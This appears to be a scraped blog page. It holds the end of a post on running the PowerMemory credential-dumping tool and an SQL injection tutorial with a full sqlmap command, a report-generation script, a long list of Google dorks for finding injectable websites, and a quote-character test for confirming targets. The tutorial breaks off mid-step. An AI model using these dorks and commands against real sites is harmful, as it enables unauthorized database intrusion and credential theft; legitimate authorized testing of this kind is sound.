2) Extract the files contained in the ZIP archive<br />
3) Execute PowerShell with Administrator Rights<br />
4) Prepare your environment (Enter this command : “Set-ExecutionPolicy Unrestricted -force”and press <b>Enter</b>)<br />
5) Open the tool into PowerShell (Browse to the place where you extract
the tool you download in step 1 and click
on Reveal-MemoryCredentials.ps1 and then on Open).<br />
6) Launch the tool<br />
7) Get password<br />
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/resultWindows8-PowerMemory.png"><img alt="resultWindows8 PowerMemory" class="aligncenter wp-image-39726" height="266" src="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/resultWindows8-PowerMemory.png" width="499" /></a><br />
<strong>The PowerMemory tool is available for download at </strong><a href="https://codeload.github.com/giMini/PowerMemory/zip/master" rel="nofollow" target="_blank">PowerMemory.zip(1.32 MB)</a> | Clone <a href="https://github.com/giMini/PowerMemory" rel="nofollow" target="_blank">Url</a><br />
meanwhile its source is available on GitHub <a href="https://github.com/giMini" rel="nofollow" target="_blank">https://github.com/giMini</a>,</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com95tag:blogger.com,1999:blog-4509349481580895365.post-45782942025047394262015-08-28T12:06:00.001+05:302015-08-28T12:08:02.662+05:30Sql injection Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
HI friends<br />
<br />
if you were buzzed about how to simulate sql injection or attack/test a website using sql injection this article is for u<br />
<br />
There were several tools to perform sql injection ,but inorder to automate there were tools like : sqlmap,bbqsql etc<br />
<br />
<b>SQLMap Tutorial</b> :<br />
<br />
For your reference of sqlmap cheatsheet available over <a href="https://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0CB4QFjAAahUKEwi8t9Slk8vHAhUSj44KHVEnAe4&url=https%3A%2F%2Fpacketstormsecurity.com%2Ffiles%2F127647%2FSQLmap-Cheatsheet-1.0.html&ei=yP_fVbyzLpKeugTRzoTwDg&usg=AFQjCNFghMHrCqD0zYKrfkArm1HR6FGSCQ&sig2=u_jRWb7T1p-Xs6ZNnoeByA" target="_blank">here </a><br />
<br />
The simple command to test using sqlmap was as follows :<br />
<br />
<pre>python sqlmap.py -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2
--keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=4 --banner --is-dba --dbs --tables --technique=BEUST
-s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/scan_out.txt</pre>
<pre> </pre>
<pre> </pre>
<pre>if you were using kali linux(All in single line) paste it to terminal :</pre>
<blockquote class="tr_bq">
<br />
sqlmap -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2
--keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=4 --banner --is-dba --dbs --tables --technique=BEUST
-s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/scan_out.txt </blockquote>
From owsap the explanation would be as follows :<br />
<br />
<br />
<br />
<b>Options used to specify HTTP communication behaviors:</b>
<br />
<ul>
<li> -v: Set the verbosity level of output messages (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.1" rel="nofollow">Option details section</a>).
</li>
<li> --url: Run sqlmap against a single target URL (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.2" rel="nofollow">Option details section</a>).
</li>
<li> --user-agent: Providing custom User-Agent (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.3" rel="nofollow">Option details section</a>).
</li>
<li> --delay: Number of seconds to hold between each HTTP(S) request (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.3" rel="nofollow">Option details section</a>).
</li>
<li> --timeout: Number of seconds to wait before considering the HTTP(S) request timed out (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.3" rel="nofollow">Option details section</a>).
</li>
<li> --retries: Maximum number of retries when the HTTP(S) connection timeouts (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.3" rel="nofollow">Option details section</a>).
</li>
<li> --keep-alive: Use persistent HTTP(s) connections (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.4" rel="nofollow">Option details section</a>).
</li>
<li> --threads: Maximum number of concurrent HTTP(S) requests that sqlmap is allowed to do (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.4" rel="nofollow">Option details section</a>).
</li>
<li> --eta: Calculate and show in real time the estimated time of
arrival to retrieve each query output. This is shown when the technique
used to retrieve the output is any of the blind SQL injection type (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
<li> --batch: This will leave sqlmap to go with a default behaviour whenever user's input would be required (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
</ul>
<br />
<b>Options used to specify audit behaviors:</b>
<br />
<ul>
<li> --dbms: Force back-end DBMS to this value (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.5" rel="nofollow">Option details section</a>).
</li>
<li> --os: Force back-end DBMS operating system to this value (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.5" rel="nofollow">Option details section</a>).
</li>
<li> --level: Level of tests to perform from 1 to 5, default is 1 (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.6" rel="nofollow">Option details section</a>).
</li>
<li> --risk: Specifies the risk of tests to perform from 1 to 3, default is 1 (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.6" rel="nofollow">Option details section</a>).
</li>
<li> --banner: Try to retrieve the database management systems product banner (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.9" rel="nofollow">Option details section</a>).
</li>
<li> --is-dba: Detect if the current database management system session user is a database administrator (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.9" rel="nofollow">Option details section</a>).
</li>
<li> --dbs: Try to enumerate the list of databases (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.9" rel="nofollow">Option details section</a>).
</li>
<li> --tables: Try to enumerate DBMS database tables (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.9" rel="nofollow">Option details section</a>).
</li>
<li> --technique: SQL injection techniques to test for, default is BEUST (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.7" rel="nofollow">Option details section</a>),
<ul>
<li> B: Boolean-based blind SQL injection
</li>
<li> E: Error-based SQL injection
</li>
<li> U: UNION query SQL injection
</li>
<li> S: Stacked queries SQL injection
</li>
<li> T: Time-based blind SQL injection
</li>
</ul>
</li>
</ul>
<br />
<b>Options used to specify scan information's' saving behaviors:</b>
<br />
<ul>
<li> -s: Save and resume all data retrieved on a session file (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
<li> --flush-session: Flush the content of file specified by '-s' in
order to avoid the caching mechanisms implemented by default in sqlmap (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
<li> -t: Log all HTTP traffic into a textual file (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
<li> --fresh-queries: Ignores query results stored in session file (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
</ul>
<br />
Extract from SQLMap documentation about SQL injection techniques identified by B/E/U/S/T (<a class="external free" href="http://sqlmap.sourceforge.net/doc/README.html#toc1.3" rel="nofollow">http://sqlmap.sourceforge.net/doc/README.html#toc1.3</a>):
<br />
<pre>[B]oolean-based blind SQL injection, also known as inferential SQL injection: sqlmap replaces or appends to the affected parameter
in the HTTP request, a syntatically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose
the user want to retrieve the output. For each HTTP response, by making a comparison between the HTTP response headers/body with
the original request, the tool inference the output of the injected statement character by character. Alternatively, the user can
provide a string or regular expression to match on True pages. The bisection algorithm implemented in sqlmap to perform this technique
is able to fetch each character of the output with a maximum of seven HTTP requests. Where the output is not within the clear-text plain
charset, sqlmap will adapt the algorithm with bigger ranges to detect the output.
[E]rror-based SQL injection: sqlmap replaces or append to the affected parameter a database-specific syntatically wrong statement and
parses the HTTP response headers and body in search of DBMS error messages containing the injected pre-defined chain of characters and
the statement output within. This technique works when the web application has been configured to disclose back-end database management
system error messages only.
[U]NION query SQL injection, also known as inband SQL injection: sqlmap appends to the affected parameter a syntatically valid SQL statement
string starting with a UNION ALL SELECT. This techique works when the web application page passes the output of the SELECT statement within
a for cycle, or similar, so that each line of the query output is printed on the page content. sqlmap is also able to exploit partial
(single entry) UNION query SQL injection vulnerabilities which occur when the output of the statement is not cycled in a for construct
whereas only the first entry of the query output is displayed.
[S]tacked queries SQL injection, also known as multiple statements SQL injection: sqlmap tests if the web application supports stacked queries
then, in case it does support, it appends to the affected parameter in the HTTP request, a semi-colon (;) followed by the SQL statement to be
executed. This technique is useful to run SQL statements other than SELECT like, for instance, data definition or data manipulation statements
possibly leading to file system read and write access and operating system command execution depending on the underlying back-end database
management system and the session user privileges.
[T]ime-based blind SQL injection, also known as full blind SQL injection: sqlmap replaces or appends to the affected parameter in the HTTP request,
a syntatically valid SQL statement string containing a query which put on hold the back-end DBMS to return for a certain number of seconds.
For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool inference the output of
the injected statement character by character. Like for boolean-based technique, the bisection algorithm is applied.
</pre>
<h2>
<span class="mw-headline" id="Report">Report</span></h2>
The python script below can be used to generate a HTML report from
the stdout of the command line (redirected to "/tmp/scan_out.txt" in the
SQLMap command line):
<br />
<pre>###########################################
# Script to generate a HTML report from a
# SQLMap stdout output
#
# Author : Dominique Righetto
# dominique.righetto@owasp.org
# Date : March 2012
###########################################
import sys
#I/O paths, take SQLMap STDOUT file from script parameter
stdout_file_path = sys.argv[1]
report_file_path = stdout_file_path + ".html"
#Open STDOUT file in read mode
file_handle_read = open(stdout_file_path,"r")
#Open REPORT file in write mode
file_handle_write = open(report_file_path,"w")
#Initialize HTML report stream
file_handle_write.write("<html xmlns=\"http://www.w3.org/1999/xhtml\" lang=\"en\" xml:lang=\"en\">")
file_handle_write.write("<head><link rel=\"StyleSheet\" href=\"style.css\" type=\"text/css\" media=\"screen\" /><title>SQLMap HTML Report</title></head>")
file_handle_write.write("<body><table id=\"myStyle\">")
file_handle_write.write("<thead><tr><th scope=\"col\">Test datetime</th><th scope=\"col\">Test description</th></tr></thead>")
file_handle_write.write("<tbody>")
#Flag to know is global audit is OK
cannot_find_injectable_parameter = False
#Read STDOUT file line by line
for line in file_handle_read:
if (line.strip().startswith("[")) and (line.find("[*]") == -1):
#Check for special message indicating audit global status
if(line.lower().find("all parameters are not injectable") > -1):
cannot_find_injectable_parameter = True
#Report generation
line_part = line.strip().split(" ")
if (line_part[2].lower() == "testing"):
#Extract useful informations
execution_datatime = line_part[0]
execution_trace = ""
count = 2
while(count < len(line_part)):
execution_trace = execution_trace + " " + line_part[count]
count = count + 1
#Write report HTML line
file_handle_write.write("<tr><td>" + line_part[0] + "</td><td>" + execution_trace + "</td></tr>")
file_handle_write.write("</tbody></table>")
#Write global audit stauts line
if(cannot_find_injectable_parameter):
file_handle_write.write("<h1 class=\"success\">SQLMap cannot find injectable parameters !</h1>")
else:
file_handle_write.write("<h1 class=\"fail\">SQLMap can find injectable parameters !</h1>")
#Finalize report HTML stream
file_handle_write.write("</body></html>")
#Close I/O stream
file_handle_write.close()
file_handle_read.close()
#Print some informations
print "Report generated to " + report_file_path
</pre>
To generate the report use the command line below:
<br />
<pre>python SQMReportGenerator.py /tmp/scan_out.txt
</pre>
The report will be generated into the same location than the input
file using source file name and adding ".html" extension as report name.
<br />
The script use an external CSS file named "style.css" (located into the same location than the report) to format report.
<br />
A CSS sample is available below:
<br />
<pre>body
{
line-height: 1.6em;
}
.success
{
font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;
text-align: center;
color: green;
}
.fail
{
font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;
text-align: center;
color: red;
}
#myStyle
{
font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;
font-size: 12px;
margin: 45px;
width: 75%;
text-align: left;
border-collapse: collapse;
border: 1px solid #6cf;
}
#myStyle th
{
padding: 20px;
font-weight: normal;
font-size: 13px;
color: #039;
text-transform: uppercase;
text-align: center;
border-right: 1px solid #0865c2;
border-top: 1px solid #0865c2;
border-left: 1px solid #0865c2;
border-bottom: 1px solid #fff;
}
#myStyle td
{
padding: 10px 20px;
color: #669;
border-right: 1px dashed #6cf;
}
</pre>
Example of generated report:
<br />
<a class="image" href="https://www.owasp.org/index.php/File:SQLMapExampleReport.png"><img alt="SQLMapExampleReport.png" height="679" src="https://www.owasp.org/images/d/d9/SQLMapExampleReport.png" style="vertical-align: bottom;" width="1428" /></a>
<br />
<h2>
<span class="mw-headline" id="Remark_about_scan_scheduling">Remark about scan scheduling</span></h2>
The scan take a while then it's recommended to schedule is execution:
<br />
<ul>
<li> During the night for a daily audit case.
</li>
<li> During the week-end for a weekly audit case. </li>
</ul>
<br />
if you were looking for practical example this would be a good one :<br />
<br />
<br />
<h2>
<span id="What_is_SQLMAP"><span style="color: #993300;">What is SQLMAP</span></span></h2>
sqlmap
is an open source penetration testing tool that automates the process
of detecting and exploiting SQL injection flaws and taking over of
database servers. It comes with a powerful detection engine, many niche
features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from
the database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.<br />
<br />
<h3>
<span id="Features"><span style="color: #993300;">Features</span></span></h3>
<ol>
<li>Full
support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft
Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database
management systems.</li>
<li>Full support for six SQL injection
techniques: boolean-based blind, time-based blind, error-based, UNION
query, stacked queries and out-of-band.</li>
<li>Support to directly
connect to the database without passing via a SQL injection, by
providing DBMS credentials, IP address, port and database name.</li>
<li>Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.</li>
<li>Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.</li>
<li>Support
to dump database tables entirely, a range of entries or specific
columns as per user’s choice. The user can also choose to dump only a
range of characters from each column’s entry.</li>
<li>Support to search
for specific database names, specific tables across all databases or
specific columns across all databases’ tables. This is useful, for
instance, to identify tables containing custom application credentials
where relevant columns’ names contain string like name and pass.</li>
<li>Support
to download and upload any file from the database server underlying
file system when the database software is MySQL, PostgreSQL or Microsoft
SQL Server.</li>
<li>Support to execute arbitrary commands and retrieve
their standard output on the database server underlying operating system
when the database software is MySQL, PostgreSQL or Microsoft SQL
Server.</li>
<li>Support to establish an out-of-band stateful TCP
connection between the attacker machine and the database server
underlying operating system. This channel can be an interactive command
prompt, a Meterpreter session or a graphical user interface (VNC)
session as per user’s choice.</li>
<li>Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.</li>
</ol>
[Source: www.sqlmap.org]Be
considerate to the user who spends time and effort to put up a website
and possibly depends on it to make his days end. Your actions might
impact someone is a way you never wished for. I think I can’t make it
anymore clearer.<br />
So here goes:<br />
<div class="toc_transparent no_bullets" id="toc_container">
<div class="toc_title">
Contents <span class="toc_toggle">[<a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#">hide</a>]</span></div>
<ul class="toc_list">
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#What_is_SQLMAP">What is SQLMAP</a><ul>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Features">Features</a></li>
</ul>
</li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_1_Find_a_Vulnerable_Website">Step 1: Find a Vulnerable Website</a><ul>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_1a_Google_Dorks_strings_to_find_Vulnerable_SQLMAP_SQL_injectable_website">Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website</a></li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_1b_Initial_check_to_confirm_if_website_is_vulnerable_to_SQLMAP_SQL_Injection">Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection</a><ul>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Microsoft_SQL_Server">Microsoft SQL Server</a></li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#MySQL_Errors">MySQL Errors</a></li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Oracle_Errors">Oracle Errors</a></li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#PostgreSQL_Errors">PostgreSQL Errors</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_2_List_DBMS_databases_using_SQLMAP_SQL_Injection">Step 2: List DBMS databases using SQLMAP SQL Injection</a></li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_3_List_tables_of_target_database_using_SQLMAP_SQL_Injection">Step 3: List tables of target database using SQLMAP SQL Injection</a></li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_4_List_columns_on_target_table_of_selected_database_using_SQLMAP_SQL_Injection">Step 4: List columns on target table of selected database using SQLMAP SQL Injection</a></li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_5_List_usernames_from_target_columns_of_target_table_of_selected_database_using_SQLMAP_SQL_Injection">Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection</a></li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_6_Extract_password_from_target_columns_of_target_table_of_selected_database_using_SQLMAP_SQL_Injection">Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection</a></li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_7_Cracking_password">Step 7: Cracking password</a><ul>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_7a_Identify_Hash_type">Step 7.a: Identify Hash type</a></li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Step_7b_Crack_HASH_using_cudahashcat">Step 7.b: Crack HASH using cudahashcat</a></li>
</ul>
</li>
<li><a href="http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/#Conclusion">Conclusion</a></li>
</ul>
</div>
<br />
<h2>
<span id="Step_1_Find_a_Vulnerable_Website"><span style="color: #993300;">Step 1: Find a Vulnerable Website</span></span></h2>
This
is usually the toughest bit and takes longer than any other steps.
Those who know how to use Google Dorks knows this already, but in case
you don’t I have put together a number of strings that you can search in
Google. Just copy paste any of the lines in Google and Google will show
you a number of search results.<br />
<br />
<h3>
<span id="Step_1a_Google_Dorks_strings_to_find_Vulnerable_SQLMAP_SQL_injectable_website"><span style="color: #993300;">Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website</span></span></h3>
This
list a really long.. Took me a long time to collect them. If you know
SQL, then you can add more here.. Put them in comment section and I will
add them here.<br />
<br />
<table class="tg"><tbody>
<tr><th class="tg-031e" style="text-align: left;">Google Dork string Column 1</th><th class="tg-031e" style="text-align: left;">Google Dork string Column 2</th><th class="tg-031e" style="text-align: left;">Google Dork string Column 3</th></tr>
<tr><td class="tg-vn4c">inurl:item_id=</td><td class="tg-vn4c">inurl:review.php?id=</td><td class="tg-vn4c">inurl:hosting_info.php?id=</td></tr>
<tr><td class="tg-031e">inurl:newsid=</td><td class="tg-031e">inurl:iniziativa.php?in=</td><td class="tg-031e">inurl:gallery.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:trainers.php?id=</td><td class="tg-vn4c">inurl:curriculum.php?id=</td><td class="tg-vn4c">inurl:rub.php?idr=</td></tr>
<tr><td class="tg-031e">inurl:news-full.php?id=</td><td class="tg-031e">inurl:labels.php?id=</td><td class="tg-031e">inurl:view_faq.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:news_display.php?getid=</td><td class="tg-vn4c">inurl:story.php?id=</td><td class="tg-vn4c">inurl:artikelinfo.php?id=</td></tr>
<tr><td class="tg-031e">inurl:index2.php?option=</td><td class="tg-031e">inurl:look.php?ID=</td><td class="tg-031e">inurl:detail.php?ID=</td></tr>
<tr><td class="tg-vn4c">inurl:readnews.php?id=</td><td class="tg-vn4c">inurl:newsone.php?id=</td><td class="tg-vn4c">inurl:index.php?=</td></tr>
<tr><td class="tg-031e">inurl:top10.php?cat=</td><td class="tg-031e">inurl:aboutbook.php?id=</td><td class="tg-031e">inurl:profile_view.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:newsone.php?id=</td><td class="tg-vn4c">inurl:material.php?id=</td><td class="tg-vn4c">inurl:category.php?id=</td></tr>
<tr><td class="tg-031e">inurl:event.php?id=</td><td class="tg-031e">inurl:opinions.php?id=</td><td class="tg-031e">inurl:publications.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:product-item.php?id=</td><td class="tg-vn4c">inurl:announce.php?id=</td><td class="tg-vn4c">inurl:fellows.php?id=</td></tr>
<tr><td class="tg-031e">inurl:sql.php?id=</td><td class="tg-031e">inurl:rub.php?idr=</td><td class="tg-031e">inurl:downloads_info.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:index.php?catid=</td><td class="tg-vn4c">inurl:galeri_info.php?l=</td><td class="tg-vn4c">inurl:prod_info.php?id=</td></tr>
<tr><td class="tg-031e">inurl:news.php?catid=</td><td class="tg-031e">inurl:tekst.php?idt=</td><td class="tg-031e">inurl:shop.php?do=part&id=</td></tr>
<tr><td class="tg-vn4c">inurl:index.php?id=</td><td class="tg-vn4c">inurl:newscat.php?id=</td><td class="tg-vn4c">inurl:productinfo.php?id=</td></tr>
<tr><td class="tg-031e">inurl:news.php?id=</td><td class="tg-031e">inurl:newsticker_info.php?idn=</td><td class="tg-031e">inurl:collectionitem.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:index.php?id=</td><td class="tg-vn4c">inurl:rubrika.php?idr=</td><td class="tg-vn4c">inurl:band_info.php?id=</td></tr>
<tr><td class="tg-031e">inurl:trainers.php?id=</td><td class="tg-031e">inurl:rubp.php?idr=</td><td class="tg-031e">inurl:product.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:buy.php?category=</td><td class="tg-vn4c">inurl:offer.php?idf=</td><td class="tg-vn4c">inurl:releases.php?id=</td></tr>
<tr><td class="tg-031e">inurl:article.php?ID=</td><td class="tg-031e">inurl:art.php?idm=</td><td class="tg-031e">inurl:ray.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:play_old.php?id=</td><td class="tg-vn4c">inurl:title.php?id=</td><td class="tg-vn4c">inurl:produit.php?id=</td></tr>
<tr><td class="tg-031e">inurl:declaration_more.php?decl_id=</td><td class="tg-031e">inurl:news_view.php?id=</td><td class="tg-031e">inurl:pop.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:pageid=</td><td class="tg-vn4c">inurl:select_biblio.php?id=</td><td class="tg-vn4c">inurl:shopping.php?id=</td></tr>
<tr><td class="tg-031e">inurl:games.php?id=</td><td class="tg-031e">inurl:humor.php?id=</td><td class="tg-031e">inurl:productdetail.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:page.php?file=</td><td class="tg-vn4c">inurl:aboutbook.php?id=</td><td class="tg-vn4c">inurl:post.php?id=</td></tr>
<tr><td class="tg-031e">inurl:newsDetail.php?id=</td><td class="tg-031e">inurl:ogl_inet.php?ogl_id=</td><td class="tg-031e">inurl:viewshowdetail.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:gallery.php?id=</td><td class="tg-vn4c">inurl:fiche_spectacle.php?id=</td><td class="tg-vn4c">inurl:clubpage.php?id=</td></tr>
<tr><td class="tg-031e">inurl:article.php?id=</td><td class="tg-031e">inurl:communique_detail.php?id=</td><td class="tg-031e">inurl:memberInfo.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:show.php?id=</td><td class="tg-vn4c">inurl:sem.php3?id=</td><td class="tg-vn4c">inurl:section.php?id=</td></tr>
<tr><td class="tg-031e">inurl:staff_id=</td><td class="tg-031e">inurl:kategorie.php4?id=</td><td class="tg-031e">inurl:theme.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:newsitem.php?num=</td><td class="tg-vn4c">inurl:news.php?id=</td><td class="tg-vn4c">inurl:page.php?id=</td></tr>
<tr><td class="tg-031e">inurl:readnews.php?id=</td><td class="tg-031e">inurl:index.php?id=</td><td class="tg-031e">inurl:shredder-categories.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:top10.php?cat=</td><td class="tg-vn4c">inurl:faq2.php?id=</td><td class="tg-vn4c">inurl:tradeCategory.php?id=</td></tr>
<tr><td class="tg-031e">inurl:historialeer.php?num=</td><td class="tg-031e">inurl:show_an.php?id=</td><td class="tg-031e">inurl:product_ranges_view.php?ID=</td></tr>
<tr><td class="tg-vn4c">inurl:reagir.php?num=</td><td class="tg-vn4c">inurl:preview.php?id=</td><td class="tg-vn4c">inurl:shop_category.php?id=</td></tr>
<tr><td class="tg-031e">inurl:Stray-Questions-View.php?num=</td><td class="tg-031e">inurl:loadpsb.php?id=</td><td class="tg-031e">inurl:transcript.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:forum_bds.php?num=</td><td class="tg-vn4c">inurl:opinions.php?id=</td><td class="tg-vn4c">inurl:channel_id=</td></tr>
<tr><td class="tg-031e">inurl:game.php?id=</td><td class="tg-031e">inurl:spr.php?id=</td><td class="tg-031e">inurl:aboutbook.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:view_product.php?id=</td><td class="tg-vn4c">inurl:pages.php?id=</td><td class="tg-vn4c">inurl:preview.php?id=</td></tr>
<tr><td class="tg-031e">inurl:newsone.php?id=</td><td class="tg-031e">inurl:announce.php?id=</td><td class="tg-031e">inurl:loadpsb.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:sw_comment.php?id=</td><td class="tg-vn4c">inurl:clanek.php4?id=</td><td class="tg-vn4c">inurl:pages.php?id=</td></tr>
<tr><td class="tg-031e">inurl:news.php?id=</td><td class="tg-031e">inurl:participant.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:avd_start.php?avd=</td><td class="tg-vn4c">inurl:download.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:event.php?id=</td><td class="tg-031e">inurl:main.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:product-item.php?id=</td><td class="tg-vn4c">inurl:review.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:sql.php?id=</td><td class="tg-031e">inurl:chappies.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:material.php?id=</td><td class="tg-vn4c">inurl:read.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:clanek.php4?id=</td><td class="tg-031e">inurl:prod_detail.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:announce.php?id=</td><td class="tg-vn4c">inurl:viewphoto.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:chappies.php?id=</td><td class="tg-031e">inurl:article.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:read.php?id=</td><td class="tg-vn4c">inurl:person.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:viewapp.php?id=</td><td class="tg-031e">inurl:productinfo.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:viewphoto.php?id=</td><td class="tg-vn4c">inurl:showimg.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:rub.php?idr=</td><td class="tg-031e">inurl:view.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:galeri_info.php?l=</td><td class="tg-vn4c">inurl:website.php?id=</td><td class="tg-vn4c"><br /></td></tr>
</tbody></table>
<br />
<h3>
<span id="Step_1b_Initial_check_to_confirm_if_website_is_vulnerable_to_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection</span></span></h3>
For
every string show above, you will get huundreds of search results. How
do you know which is really vulnerable to SQLMAP SQL Injection. There’s
multiple ways and I am sure people would argue which one is best but to
me the following is the simplest and most conclusive.<br />
Let’s say you searched using this string <code> inurl:item_id= </code> and one of the search result shows a website like this:<br />
<pre>http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15</pre>
Just add a single quotation mark <code> ' </code> at the end of the URL. (Just to ensure, <code> " </code> is a double quotation mark and <code> ' </code> is a single quotation mark).<br />
So now your URL will become like this:<br />
<pre>http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'</pre>
If
